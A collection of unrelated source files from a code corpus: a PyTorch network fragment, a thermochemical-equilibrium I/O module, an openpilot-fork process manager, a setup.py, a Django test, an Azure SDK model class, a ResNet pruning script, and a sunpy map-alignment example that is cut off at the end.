model_params.bn_affine = self.DEFAULT_BN_AFFINE # bn_affine = model_params.bn_affine bn_affine = bn self.model_params = model_params mono = [ nn.Conv2d( c, int(nnsize * c), nnks, stride=stride, padding=padding, dilation=dilation, bias=not bn_affine, ) ] conv_nets = [ nn.Conv2d( int(nnsize * c), int(nnsize * c), nnks, stride=stride, padding=padding, dilation=dilation, bias=not bn_affine, ) for _ in range(nb_nets) ] if pooling: for i in range(nb_nets): conv_nets[i] = nn.Sequential( conv_nets[i], nn.MaxPool2d( kernel_size=nnks, padding=padding, stride=stride, dilation=dilation, ), ) if bn or bn_affine: mono.append( nn.BatchNorm2d(int(nnsize * c), track_running_stats=True, affine=bn_affine) ) for i in range(nb_nets): conv_nets[i] = nn.Sequential( conv_nets[i], nn.BatchNorm2d( int(nnsize * c), track_running_stats=True, affine=bn_affine ), ) self.mono = nn.Sequential(*mono) self.conv_nets = nn.ModuleList(conv_nets) self.v = nn.Linear(int(nnsize * c) * h * w, 1) self.pi_logit = nn.Conv2d( int(nnsize * c), c_prime, nnks, stride=stride, padding=padding, dilation=dilation ) @torch.jit.script_method def _forward(self, x: torch.Tensor, return_logit: bool): bs = x.shape[0] h = F.relu(self.mono(x)) for conv_net in self.conv_nets: h = F.relu(conv_net(h)) v = torch.tanh(self.v(h.flatten(1))) pi_logit = self.pi_logit(h).flatten(1) if return_logit: return v, pi_logit s = pi_logit.shape pi = F.softmax(pi_logit.flatten(1), 1).reshape(s) return v, pi @torch.jit.script_method def forward(self, x: torch.Tensor): v, pi_logit = self._forward(x, True) pi_logit = pi_logit.view(-1, self.c_prime, self.h_prime, self.w_prime) reply = {"v": v, "pi_logit": pi_logit} return reply
the-stack_106_24291
############################# BEGIN FRONTMATTER ################################ # # # TEA - calculates Thermochemical Equilibrium Abundances of chemical species # # # # TEA is part of the PhD dissertation work of Dr. Jasmina # # Blecic, who developed it with coding assistance from # # undergraduate M. Oliver Bowman and under the advice of # # Prof. Joseph Harrington at the University of Central Florida, # # Orlando, Florida, USA. # # # # Copyright (C) 2014-2016 University of Central Florida # # # # This program is reproducible-research software: you can # # redistribute it and/or modify it under the terms of the # # Reproducible Research Software License as published by # # Prof. Joseph Harrington at the University of Central Florida, # # either version 0.3 of the License, or (at your option) any later # # version. # # # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # # Reproducible Research Software License for more details. # # # # You should have received a copy of the Reproducible Research # # Software License along with this program. If not, see # # <http://planets.ucf.edu/resources/reproducible/>. The license's # # preamble explains the situation, concepts, and reasons surrounding # # reproducible research, and answers some common questions. # # # # This project was started with the support of the NASA Earth and # # Space Science Fellowship Program, grant NNX12AL83H, held by # # Jasmina Blecic, Principal Investigator Joseph Harrington, and the # # NASA Science Mission Directorate Planetary Atmospheres Program, # # grant NNX12AI69G. # # # # See the file ACKNOWLEDGING in the top-level TEA directory for # # instructions on how to acknowledge TEA in publications. # # # # Visit our Github site: # # https://github.com/dzesmin/TEA/ # # # # Reach us directly at: # # Jasmina Blecic <[email protected]> # # # ############################## END FRONTMATTER ################################# import numpy as np from sys import stdout # ============================================================================= # This is an auxiliary program that allows each program to read the output of # the previous step so the data can be used in the next step. It also manages # the format for each output file and produces both machine-readable and # human-readable files. # # It contains the following functions: # readheader(): Reads the header file for the pipeline. # readoutput(): Reads output files produced and used by the pipeline. # output(): Writes machine readable output. # fancyout(): Writes human-readable output. # fancyout_results(): Writes final results in human-readable format. # printout(): Prints iteration number. # ============================================================================= def readheader(file): ''' Reads the current header file (one T-P) and returns data common to each step of TEA. It searches only for the required chemical data and fills out the output arrays. The function is used by balance.py, lagrange.py, lambdacorr.py, and iterate.py. Parameters ---------- file: ASCII file Header for the current layer in the atmosphere, e.g., one T-P Returns ------- pressure: float Current pressure. temp: float Current temperature. i: integer Number of molecular species. j: integer Number of elements speclist: string array Array containing names of molecular species. a: integer array Array of stoichiometric values for each element in the species. b: float array Array containing elemental abundances - ratio of the number density of a single element to the total sum of elemental number densities in the mixture. g_RT: float array Array containing chemical potentials for each species at the current T-P. ''' # Open header file to read f = open(file, 'r+') # Initiate reading the file from zero-th line l = 0 # Start indicates when data begins, begin with False so top comment is not # included in data start = False # Set marker for comments comment = '#' # Allocates lists of speclist = [] # species names a = [[]] # stoichiometric values c = [] # chemical potential # Read the file line by line and if correct line is found, assign the data # to corresponding variables and convert to floats/strings for line in f.readlines(): contents = [value for value in line.split()] # Boolean to check if the line is blank is_blank = (contents == []) # Check if non-blank line is comment or data if not is_blank: # Boolean to check if the line is comment is_comment = (contents[0][0] == comment) # If line is not comment or blank start reading if not start and contents[0][0].isdigit(): start = l if start: # Skip line if blank or comment if is_comment or is_blank: start += 1 # Read pressure elif (l == start): pressure = np.float([value for value in line.split()][0]) # Read temperature elif (l == start+1): temp = np.float([value for value in line.split()][0]) # Read elemental abundances elif (l == start+2): val = [value for value in line.split()] b = [float(u) for u in val[1:]] # Read species list, stoichiometry, and chemical potentials elif (l == start+3): val = [value for value in line.split()] speclist = np.append(speclist, val[0]) a = [[int(u) for u in val[1:-1]]] g_RT = np.float(val[-1]) elif (l > start+3): val = [value for value in line.split()] speclist = np.append(speclist, val[0]) a = np.append(a, [[int(u) for u in val[1:-1]]], axis=0) g_RT = np.append(g_RT, np.float(val[-1])) # Go to the next line of the file and check again l += 1 # Take the number of species and elements i = speclist.size j = a.shape[1] f.close() # Convert b array to list b = np.array(b).tolist() return pressure, temp, i, j, speclist, a, b, g_RT def readoutput(file): ''' This function reads output files made by the balance.py, lagrange.py and lambdacorr.py. It reads any iteration's output and returns the data in an array. Parameters ---------- file: ASCII file Header for the current layer in the atmosphere, i.e. one T-P Returns ------- header: string Name of the header file used. it_num: integer Iteration number. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for current iteration. x: float array Array containing final mole numbers of molecular species for current iteration. delta: float array Array containing change in mole numbers of molecular species for current iteration. y_bar: float Array containing sum of initial mole numbers for all molecular species for current iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for current iteration. delta_bar: float Change in total mole numbers of all species. ''' # Open output file to read f = open(file, 'r') # Allocate and fill out data array with all info data = [] for line in f.readlines(): l = [value for value in line.split()] data.append(l) # Close file f.close() # Take appropriate data header = data[0][0] # header name it_num = np.array(data[1]).astype(np.int)[0] # iteration number speclist = np.array(data[2]).astype(np.str) # species list y = np.array(data[3]).astype(np.float) # initial mole numbers x = np.array(data[4]).astype(np.float) # final mole numbers delta = np.array(data[5]).astype(np.float) # difference (x - y) y_bar = np.array(data[6]).astype(np.float)[0] # sum of y_i's x_bar = np.array(data[7]).astype(np.float)[0] # sum of x_i's delta_bar = np.array(data[8]).astype(np.float)[0] # difference in sums return(header, it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar) def output(header, it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar, file, verb=0): ''' This function produces machine-readable output files. The files are saved only if saveout = True in TEA.cfg file. The function is used by the balance.py, lagrange.py, and lambdacorr.py. The function writes the name of the header, current iteration number, species list, starting mole numbers of species for current iteration, final mole numbers of molecular species after the iteration is done, difference between starting and final mole numbers, total sum of initial mole numbers, total sum of final mole numbers and the change in total mole numbers of all species. Parameters ---------- header: string Name of the header file used. it_num: integer Iteration number. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for current iteration. x: float array Array containing final mole numbers of molecular species for current iteration. delta: float array Array containing change in mole numbers of molecular species for current iteration. y_bar: float Array containing sum of initial mole numbers for all molecular species for current iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for current iteration. delta_bar: float Change in total mole numbers of all species. file: string Name of output file to be written. verb: Integer Verbosity level (0=mute, 1=quiet, 2=verbose). ''' # Open file to write f = open(file, 'w+') # Count number of species i = speclist.size # Write the location of the header file f.write(header + '\n') # 1st row # Write current number of iteration f.write(np.str(it_num) + '\n') # 2nd row # Write species list for n in np.arange(i): # 3rd row f.write(speclist[n] + ' ') if n == (i-1): f.write('\n') # Write starting mole numbers of molecular species for that iteration for n in np.arange(i): # 4th row f.write(np.str(y[n]) + ' ') if n == (i-1): f.write('\n') # Write final mole numbers of molecular species after iteration is done for n in np.arange(i): # 5th row f.write(np.str(x[n]) + ' ') if n == (i-1): f.write('\n') # Write difference between initial and final mole numbers for n in np.arange(i): # 6th row f.write(np.str(delta[n]) + ' ') if n == (i-1): f.write('\n') # Write total sum of initial mole numbers f.write(np.str(y_bar) + '\n') # 7th row # Write total sum of final mole numbers f.write(np.str(x_bar) + '\n') # 8th row # Write difference of total mole numbers f.write(np.str(delta_bar) + '\n') # 9th row f.close() # Debugging check if verb > 1: print('\n\nMade file \'' + file + '\' containing machine data.') def fancyout(it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar, file, verb=0): ''' This function produces human readable output files. The files are saved only if saveout = True in TEA.cfg file. The function is used by the balance.py, lagrange.py, and lambdacorr.py. The function writes the name of the header, current iteration number, species list, starting mole numbers of species for current iteration, final mole numbers of molecular species after the iteration is done, difference between starting and final mole numbers, total sum of initial mole numbers, total sum of final mole numbers and the change in total mole numbers of all species. If verb>1, all data written to the file is presented on-screen. Parameters ---------- it_num: integer Iteration number. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for current iteration. x: float array Array containing final mole numbers of molecular species for current iteration. delta: float array Array containing change in mole numbers of molecular species for current iteration. y_bar: float Array containing sum of initial mole numbers for all molecular species for current iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for current iteration. delta_bar: float Change in total mole numbers of all species. file: string Name of output file to be written. verb: Integer Verbosity level (0=mute, 1=quiet, 2=verbose). ''' # Open file to write f = open(file, 'w+') # Write top comment and iteration number f.write('This .txt file is for visual use only. \ DO NOT USE FOR ITERATIONS!\n') f.write('Data for iteration #' + np.str(it_num) + '\n\n') # Count number of species i = speclist.size # Loop over all species for n in np.arange(i): if n == 0: # Write labels for columns f.write('Species |'.rjust(14) + 'y_i |'.rjust(14) + \ 'x_i |'.rjust(14) + 'delta \n'.rjust(15)) # Fill out variables xs = '%.4e'%x[n] # Final mole numbers ys = '%.4e'%y[n] # Initial mole numbers ds = '%.4e'%delta[n] # Difference between initial and final xbs = '%.4e'%x_bar # Total sum of final mole numbers ybs = '%.4e'%y_bar # Total sum of initial mole numbers dbs = '%.4e'%delta_bar # Difference of total sums name = speclist[n] # Species name # Write mole numbers in aligned columns f.write(name.rjust(12) + ' |' + ys.rjust(12) + ' |' + xs.rjust(12) + \ ' |' +ds.rjust(13) + '\n') # Write initial, final, and difference of totals after species data if n == (i - 1): f.write('\n') f.write('y_bar : '.rjust(35) + ybs.rjust(9) + '\n') f.write('x_bar : '.rjust(35) + xbs.rjust(9) + '\n') f.write('delta_bar : '.rjust(35) + dbs.rjust(9) + '\n') f.close() # Print for debugging purposes # Print all the data from the file on the screen if verb > 1: f = open(file, 'r+') h = 0 for line in f: if h == 0: print('Made file \'' + file + '\' containing the following:') else: line = line.strip('\n') print(line) h += 1 f.close() def fancyout_results(header, it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar, pressure, temp, file, verb): ''' This function produces the final result output for each T-P in the human-readable format. The final mole number for each species is divided by the total mole numbers of all species in the mixture. This gives our final results, which is the mole fraction abundance for each species. This function is called by the iterate.py module. Parameters ---------- header: string Name of the header file used. it_num: integer Iteration number of last iteration. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for first iteration. x: float array Array containing final mole numbers of molecular species for last iteration. delta: float array Array containing change in mole numbers of molecular species for first and last iterations. y_bar: float Array containing sum of initial mole numbers for all molecular species for first iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for last iteration. delta_bar: float Change in total mole numbers of all species. file: string Name of output file to be written. verb: Integer Verbosity level (0=mute, 1=quiet, 2=verbose). ''' # Open file to read f = open(file, 'w+') # Write top comment f.write('This .txt file is for visual use only.\n') f.write('These results are for the "' + header + '" run.\n') f.write('Iterations complete after ' + np.str(it_num) + ' runs at ' + \ np.str(pressure) + ' bar and ' + np.str(temp) + \ ' K. Final computation:\n\n') # Count number of species i = speclist.size # Loop over all species for n in np.arange(i): if n == 0: # Write labels for columns f.write('Species |'.rjust(10) + 'Initial x |'.rjust(16) + \ 'Final x |'.rjust(16) + 'Delta |'.rjust(16) + \ 'Final Abun \n'.rjust(16)) # Fill out variables xs = '%8.10f'%x[n] # Final mole numbers ys = '%8.10f'%y[n] # Initial mole numbers ds = '%8.10f'%delta[n] # Difference between initial and final xbs = '%8.10f'%x_bar # Total sum of final mole numbers ybs = '%8.10f'%y_bar # Total sum of initial mole numbers dbs = '%8.10f'%delta_bar # Difference of total sums # Divide final result by the total number of moles of the species # in the mixture, making mole fractions abn_float = x[n] / x_bar abn = '%8.7e'%abn_float # Species name name = speclist[n] # Write variables in aligned columns f.write(name.rjust(8) + ' |' + ys.rjust(14) + ' |' + xs.rjust(14) + \ ' |' +ds.rjust(14) + ' |' + abn.rjust(14) + '\n') # Write initial, final, and difference of totals after species data if n == (i - 1): f.write('\n') f.write('Initial Total Mol : '.rjust(35) + ybs.rjust(9) + '\n') f.write('Final Total Mol : '.rjust(35) + xbs.rjust(9) + '\n') f.write('Change in Total Mol : '.rjust(35) + dbs.rjust(9) + '\n') f.close() # Print all the data from the file on the screen if verb > 1: f = open(file, 'r+') h = 0 for line in f: if h == 0: print('Made file \'' + file + '\' containing the following:') else: line = line.strip('\n') print(line) h += 1 f.close() def printout(str, it_num=False): ''' Prints iteration progress number or other information in one line of terminal. Parameters ---------- str: string String defining what will be printed. it_num: integer Iteration number to be printed. If False, will print out contents of str instead. ''' # Create print-out for terminal that can be overwritten stdout.write('\r\n') if np.bool(it_num): # Print iteration number stdout.write(str % it_num) else: # Print other input stdout.write(str) # Clear printed value to allow overwriting for next stdout.flush()
the-stack_106_24293
#!/usr/bin/env python3 import datetime import os import signal import subprocess import sys import traceback from multiprocessing import Process import cereal.messaging as messaging import selfdrive.crash as crash from common.basedir import BASEDIR from common.params import Params, ParamKeyType from common.text_window import TextWindow from selfdrive.boardd.set_time import set_time from selfdrive.hardware import HARDWARE, PC, EON from selfdrive.manager.helpers import unblock_stdout from selfdrive.manager.process import ensure_running, launcher from selfdrive.manager.process_config import managed_processes from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID from selfdrive.swaglog import cloudlog, add_file_handler from selfdrive.version import dirty, get_git_commit, version, origin, branch, commit, \ terms_version, training_version, comma_remote, \ get_git_branch, get_git_remote from selfdrive.hardware.eon.apk import system sys.path.append(os.path.join(BASEDIR, "pyextra")) def manager_init(): # update system time from panda set_time(cloudlog) params = Params() params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START) default_params = [ ("OpenpilotEnabledToggle", "1"), ("CommunityFeaturesToggle", "1"), ("IsMetric", "1"), # add ("SshEnabled", "1"), ("LongControlSelect", "0"), ("AutoLaneChangeEnabled", "1"), ("PutPrebuilt", "0"), ("MfcSelect", "0"), ("LateralControlSelect", "0"), ("ShutdowndDisable", "1"), ("LoggerDisable", "0"), ("SccSmootherSlowOnCurves", "0"), ("SccSmootherSyncGasPressed", "0"), ("StockNaviDecelEnabled", "0"), ("NewRadarInterface", "0"), ] if not PC: default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8'))) if params.get_bool("RecordFrontLock"): params.put_bool("RecordFront", True) if not params.get_bool("DisableRadar_Allow"): params.delete("DisableRadar") # set unset params for k, v in default_params: if params.get(k) is None: params.put(k, v) # is this dashcam? if os.getenv("PASSIVE") is not None: params.put_bool("Passive", bool(int(os.getenv("PASSIVE")))) if params.get("Passive") is None: raise Exception("Passive must be set to continue") # Create folders needed for msgq try: os.mkdir("/dev/shm") except FileExistsError: pass except PermissionError: print("WARNING: failed to make /dev/shm") # set version params params.put("Version", version) params.put("TermsVersion", terms_version) params.put("TrainingVersion", training_version) params.put("GitCommit", get_git_commit(default="")) params.put("GitBranch", get_git_branch(default="")) params.put("GitRemote", get_git_remote(default="")) # set dongle id reg_res = register(show_spinner=True) if reg_res: dongle_id = reg_res else: serial = params.get("HardwareSerial") raise Exception(f"Registration failed for device {serial}") os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog if not dirty: os.environ['CLEAN'] = '1' cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, device=HARDWARE.get_device_type()) if comma_remote and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC): crash.init() crash.bind_user(id=dongle_id) crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit, device=HARDWARE.get_device_type()) def manager_prepare(): for p in managed_processes.values(): p.prepare() def manager_cleanup(): for p in managed_processes.values(): p.stop() cloudlog.info("everything is dead") def manager_thread(): if EON: Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",)).start() system("am startservice com.neokii.optool/.MainService") Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start() cloudlog.info("manager start") cloudlog.info({"environ": os.environ}) # save boot log #subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd")) params = Params() ignore = [] if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID: ignore += ["manage_athenad", "uploader"] if os.getenv("NOBOARD") is not None: ignore.append("pandad") if os.getenv("BLOCK") is not None: ignore += os.getenv("BLOCK").split(",") ensure_running(managed_processes.values(), started=False, not_run=ignore) started_prev = False sm = messaging.SubMaster(['deviceState']) pm = messaging.PubMaster(['managerState']) while True: sm.update() not_run = ignore[:] if sm['deviceState'].freeSpacePercent < 5: not_run.append("loggerd") if params.get_bool("ShutdowndDisable"): not_run.append("shutdownd") if params.get_bool("LoggerDisable"): not_run.append("loggerd") not_run.append("deleter") not_run.append("logmessaged") not_run.append("tombstoned") not_run.append("uploader") started = sm['deviceState'].started driverview = params.get_bool("IsDriverViewEnabled") ensure_running(managed_processes.values(), started, driverview, not_run) # trigger an update after going offroad #if started_prev and not started and 'updated' in managed_processes: # os.sync() # managed_processes['updated'].signal(signal.SIGHUP) started_prev = started running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name) for p in managed_processes.values() if p.proc] cloudlog.debug(' '.join(running_list)) # send managerState msg = messaging.new_message('managerState') msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()] pm.send('managerState', msg) # TODO: let UI handle this # Exit main loop when uninstall is needed if params.get_bool("DoUninstall"): break def main(): prepare_only = os.getenv("PREPAREONLY") is not None manager_init() # Start UI early so prepare can happen in the background if not prepare_only: managed_processes['ui'].start() manager_prepare() if prepare_only: return # SystemExit on sigterm signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1)) try: manager_thread() except Exception: traceback.print_exc() crash.capture_exception() finally: manager_cleanup() if Params().get_bool("DoUninstall"): cloudlog.warning("uninstalling") HARDWARE.uninstall() if __name__ == "__main__": unblock_stdout() try: main() except Exception: add_file_handler(cloudlog) cloudlog.exception("Manager failed to start") # Show last 3 lines of traceback error = traceback.format_exc(-3) error = "Manager failed to start\n\n" + error with TextWindow(error) as t: t.wait_for_exit() raise # manual exit because we are forked sys.exit(0)
the-stack_106_24294
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import re import codecs from setuptools import setup, find_packages kwargs = {} kwargs["install_requires"] = [ "setuptools", "rdflib>=6.0", "Cython", "lsm-db", "importlib-metadata; python_version < '3.8.0'", ] kwargs["dependency_links"] = [ "git+https://github.com/RDFLib/rdflib.git#egg=rdflib", "git+https://github.com/coleifer/python-lsm-db.git#egg=lsm-db" ] kwargs["tests_require"] = [ "pytest", "pytest-cov", "pytest-subtests", ] kwargs["extras_require"] = { "tests": kwargs["tests_require"], "docs": ["sphinx < 5", "sphinxcontrib-apidoc"], } def find_version(filename): _version_re = re.compile(r'__version__ = "(.*)"') for line in open(filename): version_match = _version_re.match(line) if version_match: return version_match.group(1) def open_local(paths, mode="r", encoding="utf8"): path = os.path.join(os.path.abspath(os.path.dirname(__file__)), *paths) return codecs.open(path, mode, encoding) # long_description=""" # An adaptation of RDFLib BerkeleyDB Store’s key-value approach, using Leveldb as a back-end. # Based on an original contribution by Drew Perttula. # """ with open_local(["README.md"], encoding="utf-8") as readme: long_description = readme.read() version = find_version("rdflib_sqlitelsm/__init__.py") packages = find_packages(exclude=("examples*", "test*")) if os.environ.get("READTHEDOCS", None): # if building docs for RTD # install examples, to get docstrings packages.append("examples") setup( name="rdflib-sqlitelsm", version=version, description="rdflib extension adding SQLite’s LSM as back-end store", author="RDFLib team", maintainer="Graham Higgins", maintainer_email="[email protected]", url="https://github.com/RDFLib/rdflib-sqlitelsm", license="bsd-3-clause", platforms=["any"], python_requires=">=3.7", classifiers=[ "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "License :: OSI Approved :: BSD License", "Topic :: Software Development :: Libraries :: Python Modules", "Operating System :: OS Independent", "Natural Language :: English", ], long_description=long_description, long_description_content_type="text/markdown", packages=packages, entry_points={ "rdf.plugins.store": [ "SQLiteLSM = rdflib_sqlitelsm.sqlitelsmstore:SQLiteLSMStore", ], }, **kwargs, )
the-stack_106_24296
from django.test import TestCase from django.urls import reverse class TestApi(TestCase): def test_decode_success(self): """ Ensure decode endpoint invokes decode successfully. """ response = self.client.get(reverse("api-decode"), data={"input": "226"}) self.assertEqual(response.status_code, 200) self.assertEqual(response.json(), {"result": ["BBF", "BZ", "VF"]}) def test_decode_input_invalid(self): """ Ensure decode endpoint returns 400 when given invalid input. """ response = self.client.get(reverse("api-decode"), data={"input": "abc"}) self.assertEqual(response.status_code, 400)
the-stack_106_24301
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class DeploymentProperties(Model): """Deployment properties. :param template: The template content. It can be a JObject or a well formed JSON string. Use only one of Template or TemplateLink. :type template: object :param template_link: The template URI. Use only one of Template or TemplateLink. :type template_link: :class:`TemplateLink <azure.mgmt.resource.resources.models.TemplateLink>` :param parameters: Deployment parameters. It can be a JObject or a well formed JSON string. Use only one of Parameters or ParametersLink. :type parameters: object :param parameters_link: The parameters URI. Use only one of Parameters or ParametersLink. :type parameters_link: :class:`ParametersLink <azure.mgmt.resource.resources.models.ParametersLink>` :param mode: The deployment mode. Possible values include: 'Incremental', 'Complete' :type mode: str or :class:`DeploymentMode <azure.mgmt.resource.resources.models.DeploymentMode>` :param debug_setting: The debug setting of the deployment. :type debug_setting: :class:`DebugSetting <azure.mgmt.resource.resources.models.DebugSetting>` """ _validation = { 'mode': {'required': True}, } _attribute_map = { 'template': {'key': 'template', 'type': 'object'}, 'template_link': {'key': 'templateLink', 'type': 'TemplateLink'}, 'parameters': {'key': 'parameters', 'type': 'object'}, 'parameters_link': {'key': 'parametersLink', 'type': 'ParametersLink'}, 'mode': {'key': 'mode', 'type': 'DeploymentMode'}, 'debug_setting': {'key': 'debugSetting', 'type': 'DebugSetting'}, } def __init__(self, mode, template=None, template_link=None, parameters=None, parameters_link=None, debug_setting=None): self.template = template self.template_link = template_link self.parameters = parameters self.parameters_link = parameters_link self.mode = mode self.debug_setting = debug_setting
the-stack_106_24302
import os import argparse import numpy as np import torch import torch.nn as nn from torch.autograd import Variable from torchvision import datasets, transforms from models import * # Prune settings parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune') parser.add_argument('--dataset', type=str, default='cifar10', help='training dataset (default: cifar10)') parser.add_argument('--test-batch-size', type=int, default=256, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--depth', type=int, default=110, help='depth of the resnet') parser.add_argument('--model', default='', type=str, metavar='PATH', help='path to the model (default: none)') parser.add_argument('--save', default='', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('-v', default='A', type=str, help='version of the model') parser.add_argument('--prune', default='large', type=str, help='prune method to use') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() if not os.path.exists(args.save): os.makedirs(args.save) model = resnet(depth=args.depth, dataset=args.dataset) if args.cuda: model.cuda() if args.model: if os.path.isfile(args.model): print("=> loading checkpoint '{}'".format(args.model)) checkpoint = torch.load(args.model) args.start_epoch = checkpoint['epoch'] best_prec1 = checkpoint['best_prec1'] model.load_state_dict(checkpoint['state_dict']) print("=> loaded checkpoint '{}' (epoch {}) Prec1: {:f}" .format(args.model, checkpoint['epoch'], best_prec1)) else: print("=> no checkpoint found at '{}'".format(args.resume)) print('Pre-processing Successful!') # simple test model after Pre-processing prune (simple set BN scales to zeros) def test(model): kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {} if args.dataset == 'cifar10': test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data/dataset/cifar10', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])), batch_size=args.test_batch_size, shuffle=False, **kwargs) elif args.dataset == 'cifar100': test_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])), batch_size=args.test_batch_size, shuffle=False, **kwargs) else: raise ValueError("No valid dataset is given.") model.eval() correct = 0 for data, target in test_loader: if args.cuda: data, target = data.cuda(), target.cuda() data, target = Variable(data, volatile=True), Variable(target) output = model(data) pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability correct += pred.eq(target.data.view_as(pred)).cpu().sum() print('\nTest set: Accuracy: {}/{} ({:.1f}%)\n'.format( correct, len(test_loader.dataset), 100. * correct / len(test_loader.dataset))) return correct / float(len(test_loader.dataset)) acc = test(model) skip = { 'A': [36], 'B': [36, 38, 74], } prune_prob = { 'A': [0.5, 0.0, 0.0], 'B': [0.5, 0.4, 0.3], } layer_id = 1 cfg = [] cfg_mask = [] for m in model.modules(): if isinstance(m, nn.Conv2d): out_channels = m.weight.data.shape[0] if layer_id in skip[args.v]: cfg_mask.append(torch.ones(out_channels)) cfg.append(out_channels) layer_id += 1 continue if layer_id % 2 == 0: stage = layer_id // 36 if layer_id <= 36: stage = 0 elif layer_id <= 72: stage = 1 elif layer_id <= 108: stage = 2 prune_prob_stage = prune_prob[args.v][stage] weight_copy = m.weight.data.abs().clone().cpu().numpy() L1_norm = np.sum(weight_copy, axis=(1,2,3)) num_keep = int(out_channels * (1 - prune_prob_stage)) arg_max = np.argsort(L1_norm) # arg_max_rev = arg_max[::-1][:num_keep] if args.prune == 'large': arg_max_rev = arg_max[::-1][:num_keep] elif args.prune == 'small': arg_max_rev = arg_max[:num_keep] elif args.prune == 'random': arg_max_rev = np.random.choice(arg_max, num_keep, replace=False) mask = torch.zeros(out_channels) mask[arg_max_rev.tolist()] = 1 mask_neg = np.ones(out_channels) mask_neg[arg_max_rev.tolist()] = 0 m.weight.data[mask_neg,:,:,:] = 0 cfg_mask.append(mask) cfg.append(num_keep) layer_id += 1 continue layer_id += 1 torch.save({'cfg': cfg, 'state_dict': model.state_dict()}, os.path.join(args.save, 'pruned.pth.tar')) acc = test(model) num_parameters = sum([param.nelement() for param in model.parameters()]) with open(os.path.join(args.save, "prune.txt"), "w") as fp: fp.write("Number of parameters: \n"+str(num_parameters)+"\n") fp.write("Test accuracy: \n"+str(acc)+"\n")
the-stack_106_24307
""" ============================================== Auto-Aligning AIA and HMI Data During Plotting ============================================== This example shows how to auto-align two images with different reference frames during plotting. Here we use the optional keyword ``autoalign`` when calling Map's :meth:`~sunpy.map.GenericMap.plot` method. The reference frames are defined by the respective World Coordinate System (WCS) information. See :ref:`sphx_glr_generated_gallery_map_transformations_reprojection_align_aia_hmi.py` for an alternate approach to image alignment, where one of the maps is modified prior to plotting, and thus is available for purposes other than plotting. """ import matplotlib.pyplot as plt import astropy.units as u import sunpy.data.sample import sunpy.map ###################################################################### # We use the AIA image and HMI image from the sample data. For the # HMI map, we use the special HMI color map, which expects the plotted # range to be -1500 to 1500. map_aia = sunpy.map.Map(sunpy.data.sample.AIA_171_IMAGE) map_hmi = sunpy.map.Map(sunpy.data.sample.HMI_LOS_IMAGE) map_hmi.plot_settings['cmap'] = "hmimag" map_hmi.plot_settings['norm'] = plt.Normalize(-1500, 1500) ###################################################################### # Plot both images side by side. Note that the HMI image is oriented # "upside down" relative to the AIA image. fig = plt.figure(figsize=(12, 5)) ax1 = fig.add_subplot(121, projection=map_aia) map_aia.plot(axes=ax1, clip_interval=(1, 99.9)*u.percent) ax2 = fig.add_subplot(122, projection=map_hmi) map_hmi.plot(axes=ax2) ###################################################################### # Setting ``autoalign=True`` allows plotting the HMI image onto axes # defined by the AIA reference frame. In contrast to the above code # block, we intentionally set the ``projection`` for the axes to be # the AIA map # instead of the HMI map. We also need to manually set # the plot limits because Matplotlib gets confused by the off-disk # parts of the image. Note that the HMI image now has the same # orientation as the AIA image. fig = plt.figure(figsize=(12, 5)) ax1 = fig.add_subplot(121, projection=map_aia) map_aia.plot(axes=ax1, clip_interval=(1, 99.9)*u.percent) ax2 = fig.add_subplot(122, projection=map_aia) map_hmi.plot(axes=ax2, autoalign=True, title='HMI image in AIA reference frame') ax2.axis(ax1.axis()) ###################################################################### # We can directly plot them over one another, by setting the # transparency of the HMI plot. fig = plt.figure() ax1 = fig.add_subplot(projection=map_aia) map_aia.plot(axes=ax1, clip_interval=(1, 